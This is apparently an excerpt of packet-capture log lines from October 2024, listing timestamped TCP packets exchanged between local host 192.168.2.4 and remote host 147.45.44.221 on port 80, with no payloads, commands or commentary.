                                                                                                                                                    Oct 21, 2024 08:47:30.350361109 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.350385904 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.350404978 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.350415945 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.350425959 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.350435019 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.350444078 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.350455046 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.350464106 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.350481987 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.350491047 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.350492954 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.350505114 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.350514889 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.350522995 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.350524902 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.350536108 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.350539923 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.350563049 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.350586891 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.350594044 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.350622892 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.350627899 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.350632906 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.350681067 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.350688934 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.350701094 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.350706100 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.350713968 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.350732088 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.350743055 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.350743055 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.350754976 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.350760937 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.350785017 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.350802898 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.350809097 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.350816965 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.350853920 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.350862026 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.350864887 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.350874901 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.350883961 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.350898981 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.350920916 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.351082087 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.351129055 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.351207018 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.351217985 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.351222992 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.351241112 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.351253033 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.351262093 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.351268053 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.351274967 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.351294041 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.351295948 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.351306915 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.351311922 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.351317883 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.351329088 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.351335049 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.351340055 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.351351976 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.351358891 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.351363897 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.351382017 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.351392984 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.351401091 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.351403952 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.351413965 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.351424932 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.351434946 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.351440907 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.351440907 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.351448059 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.351457119 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.351459980 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.351489067 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.351717949 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.351728916 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.351747036 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.351757050 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.351766109 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.351768017 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.351775885 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.351778984 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.351787090 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.351799965 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.351810932 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.351835012 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.351877928 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.351890087 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.351898909 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.351908922 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.351919889 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.351923943 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.351932049 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.351941109 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.351943970 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.351955891 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.351958036 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.351977110 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.351984024 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.351991892 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.352006912 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.352014065 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.352032900 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.352034092 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.352046013 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.352051973 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.352082968 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.352092028 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.352102995 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.352138996 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.352210999 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.352229118 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.352237940 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.352248907 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.352262020 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.352262974 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.352273941 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.352281094 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.352287054 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.352299929 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.352329969 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.352372885 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.352382898 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.352401972 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.352412939 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.352413893 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.352423906 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.352436066 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.352437019 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.352447033 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.352458954 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.352464914 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.352468967 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.352478027 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.352505922 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.352508068 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.352539062 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.352549076 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.352552891 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.352576017 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.352591038 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.352613926 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.352624893 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.352634907 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.352660894 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.352684975 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.398269892 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.398284912 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.398289919 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.398417950 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.452085018 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.452299118 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.452310085 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.452321053 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.452333927 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.452343941 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.452354908 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.452363968 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.452364922 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.452380896 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.452390909 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.452399969 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.452411890 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.452421904 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.452433109 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.452441931 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.452450037 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.452455997 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.452467918 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.452476978 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.452486038 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.453183889 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.467964888 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.468014002 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.468126059 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.468136072 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.468153954 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.468163967 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.468173981 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.468178034 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.468183994 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.468195915 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.468204975 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.468216896 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.468225956 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.468235016 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.468235016 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.468238115 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.468249083 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.468257904 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.468275070 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.468291998 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.468390942 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.468410015 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.468419075 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.468436003 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.468466043 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.468514919 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.468529940 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.468539953 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.468553066 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.468578100 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.468595028 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.468631983 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.468641996 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.468669891 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.468764067 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.468774080 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.468784094 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.468792915 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.468803883 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.468806982 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.468818903 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.468822002 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.468837023 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.468843937 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.468848944 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.468861103 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.468868017 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.468888998 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.468892097 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.468900919 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.468909979 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.468934059 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.468934059 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.468949080 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.468977928 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.468987942 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.468995094 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.468997002 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.469017029 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.469027042 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.469558954 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.469607115 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.469609022 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.469619989 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.469646931 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.469649076 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.469660044 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.469660044 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.469671965 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.469681978 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.469687939 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.469695091 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.469703913 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.469717026 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.469717979 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.469717979 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.469738007 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.469738007 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.469749928 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.469762087 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.469765902 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.469778061 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.469789028 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.469799995 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.469813108 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.469818115 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.469841957 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.469866037 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.469868898 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.469877958 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.469897032 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.469903946 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.469907045 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.469928980 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.469947100 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.469949007 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.469949007 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.469957113 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.469988108 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.469991922 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.470001936 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.470011950 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.470030069 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.470038891 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.470050097 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.470057011 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.470061064 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.470081091 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.470092058 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.470102072 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.470102072 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.470113993 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.470133066 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.470136881 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:30.470153093 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.470177889 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:30.470236063 CEST8049732147.45.44.221192.168.2.4
